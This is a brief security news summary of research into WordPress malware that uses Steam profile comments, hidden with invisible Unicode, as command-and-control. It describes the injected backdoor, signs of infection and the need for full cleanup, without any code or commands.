GODADDY researchers discovered malware affecting around 1,980 WordPress sites that utilizes Valve’s Steam platform as a command-and-control (C2) infrastructure. The malware hides its C2 instructions within Steam Community profile comments using invisible Unicode characters. This allows the actual payload to be concealed as ASCII art.
The malware injects code masquerading as legitimate JavaScript libraries into WordPress sites, enabling the installation of a backdoor that listens for specific authentication cookies, allowing attackers to send malicious PHP code. Initial infections are likely due to stolen credentials or vulnerable plugins, with signs of infection including suspicious outbound connections to Steam URLs and certain PHP file characteristics. Complete cleanup is necessary to ensure that backdoor capabilities are removed, as partial measures may leave systems vulnerable.